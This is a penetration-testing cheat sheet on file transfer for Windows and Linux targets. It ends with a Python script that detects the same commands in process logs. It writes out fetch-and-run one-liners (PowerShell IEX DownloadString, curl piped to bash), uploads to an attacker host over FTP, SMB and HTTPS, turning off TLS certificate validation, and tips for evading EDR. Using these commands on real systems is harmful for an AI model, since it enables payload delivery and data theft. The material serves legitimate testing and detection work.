
File Transfer Techniques for Pentesting

Overview

File transfer techniques are critical for penetration testing, especially in restricted environments. This guide covers both Windows and Linux methods, with practical commands and methodologies.

Common Challenges

  • Host-based Controls

    • Application whitelisting

    • AV/EDR blocking

    • Process monitoring

  • Network Controls

    • Firewall restrictions

    • IDS/IPS monitoring

    • Port filtering

Windows Transfer Techniques

PowerShell Methods

Base64 Transfer (No Network Required)

# On Attacker (Linux)
cat file | base64 -w 0

# On Target (Windows)
[IO.File]::WriteAllBytes("C:\path\to\file", [Convert]::FromBase64String("<base64_string>"))

# Verify Transfer (compare with the output of md5sum on the sending host)
Get-FileHash C:\path\to\file -Algorithm MD5

Web Downloads

# Method 1: WebClient
(New-Object Net.WebClient).DownloadFile('<URL>', 'C:\path\to\outputfile')

# Method 2: Fileless Execution
IEX (New-Object Net.WebClient).DownloadString('<URL>')

# Method 3: Invoke-WebRequest
Invoke-WebRequest <URL> -UseBasicParsing -OutFile <outputfile>

SMB Transfer

# On Attacker: Start SMB Server
sudo impacket-smbserver share /tmp/smbshare -smb2support

# On Target: Copy File
copy \\<Attacker_IP>\share\file.exe

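# Authenticated SMB - On Attacker: start the server with credentials
sudo impacket-smbserver share /tmp/smbshare -smb2support -user test -password test

# On Target: map the share using the same credentials
net use Z: \\<Attacker_IP>\share /user:test test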

FTP Transfer

# On Attacker: Start FTP Server
sudo python3 -m pyftpdlib --port 21 --write

# On Target: Download
(New-Object Net.WebClient).DownloadFile('ftp://<IP>/file.txt', 'C:\path\to\outputfile')

# On Target: Upload
(New-Object Net.WebClient).UploadFile('ftp://<IP>/file', 'C:\path\to\file')

Living Off The Land (LOtL) Binaries

  • WMIC

  • Bitsadmin

  • Certutil

  • Regsvr32

Linux Transfer Techniques

Base64 Transfer

# Encode
cat file | base64 -w 0; echo

# Decode
echo -n '<base64_string>' | base64 -d > file

# Verify (the hash must match md5sum of the original file)
md5sum file

Web Transfer Methods

Download

# Wget
wget <URL> -O /path/to/file

# cURL
curl -o /path/to/file <URL>

# Fileless Execution
curl <URL> | bash
wget -qO- <URL> | python3

Upload

# cURL POST
curl -X POST https://<IP>/upload -F 'files=@/path/to/file' --insecure

# Start Python Upload Server
sudo python3 -m pip install uploadserver
sudo python3 -m uploadserver 443 --server-certificate ~/server.pem

SSH/SCP Transfer

# Start SSH Service
sudo systemctl enable ssh
sudo systemctl start ssh

# Download
scp username@<IP>:/remote/file /local/directory

# Upload
scp /local/file username@<IP>:/remote/directory

Simple Web Server

# Python3
python3 -m http.server

# PHP
php -S 0.0.0.0:8000

Common Issues & Solutions

SSL/TLS Issues (Windows)

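# Accept any server certificate (e.g. a self-signed upload server); this turns certificate validation off for the rest of the PowerShell session
[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}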

Port Considerations

  • HTTP/HTTPS (80/443) - Usually allowed

  • SMB (445) - Often blocked

  • FTP (20/21) - May be filtered

  • SSH/SCP (22) - May require configuration

Security Best Practices

  1. Transfer Verification

    • Always verify file integrity (MD5/SHA)

    • Check file permissions after transfer

  2. Operational Security

    • Clean up temporary files

    • Remove credentials after use

    • Monitor for security alerts

    • Use encryption when possible

  3. Fileless Operations

    • Prefer memory-only operations

    • Clean up artifacts

    • Be aware of logging/monitoring

  4. Network Security

    • Use HTTPS/FTPS when available

    • Consider file size limitations

    • Monitor for AV/EDR alerts
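
Seen from the logging and monitoring side that the items above refer to, the Windows and Linux commands on this page leave recognisable process command lines. The following Python is an added example, not part of the original notes: it matches those commands in tab-separated host/command-line records. The record format, rule names, severities and sample lines are assumptions constructed for illustration.

```python
import re

# Rules keyed to the transfer commands on this page: (name, severity, regex).
# Rule names and severities are assumptions made for this example.
RULES = [
    ("ps-fileless-exec", "high",
     re.compile(r"\b(IEX|Invoke-Expression)\b.*\bDownloadString\b", re.I)),
    ("ps-webclient-transfer", "medium",
     re.compile(r"Net\.WebClient\)?\.(DownloadFile|UploadFile)\b", re.I)),
    ("ps-invoke-webrequest-outfile", "medium",
     re.compile(r"\b(Invoke-WebRequest|iwr)\b.*\s-OutFile\b", re.I)),
    ("ps-base64-file-write", "medium",
     re.compile(r"WriteAllBytes\(.*FromBase64String\(", re.I)),
    ("ps-tls-validation-off", "high",
     re.compile(r"ServerCertificateValidationCallback\s*=\s*\{\s*\$true\s*\}", re.I)),
    ("smb-unc-to-raw-ip", "medium",
     re.compile(r"\\\\\d{1,3}(?:\.\d{1,3}){3}\\")),
    ("nix-pipe-to-interpreter", "high",
     re.compile(r"\b(curl|wget)\b[^|]*\|\s*(bash|sh|python3?)\b")),
    ("nix-curl-insecure-upload", "medium",
     re.compile(r"\bcurl\b(?=.*\s(-F|--form)\b)(?=.*\s(-k|--insecure)\b)")),
]

def scan(records):
    """Return (line_no, host, rule, severity) for each 'host<TAB>cmdline' match."""
    hits = []
    for n, rec in enumerate(records, 1):
        host, _, cmd = rec.partition("\t")
        hits += [(n, host, name, sev) for name, sev, rx in RULES if rx.search(cmd)]
    return hits

# Constructed sample records (documentation IP range, hypothetical hosts).
SAMPLE = [
    "ws01\t" r"powershell -c IEX (New-Object Net.WebClient).DownloadString('http://192.0.2.10/a.ps1')",
    "ws01\t" r"powershell -c (New-Object Net.WebClient).DownloadFile('ftp://192.0.2.10/file.txt', 'C:\Temp\file.txt')",
    "ws02\t" r"cmd /c copy \\192.0.2.10\share\file.exe",
    "ws02\t" r"powershell -c Get-FileHash C:\Temp\file.exe -Algorithm MD5",
    "web01\t" "curl http://192.0.2.10/s.sh | bash",
    "web01\t" "curl -X POST https://192.0.2.10/upload -F 'files=@/tmp/out.txt' --insecure",
    "web01\t" "curl -o /tmp/pkg.tgz https://mirror.example/pkg.tgz",
]

if __name__ == "__main__":
    for hit in scan(SAMPLE):
        print(*hit, sep="\t")
```

On Windows the PowerShell patterns only show up in process command lines when the command is passed as an argument; interactive use needs PowerShell script block logging as the record source.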
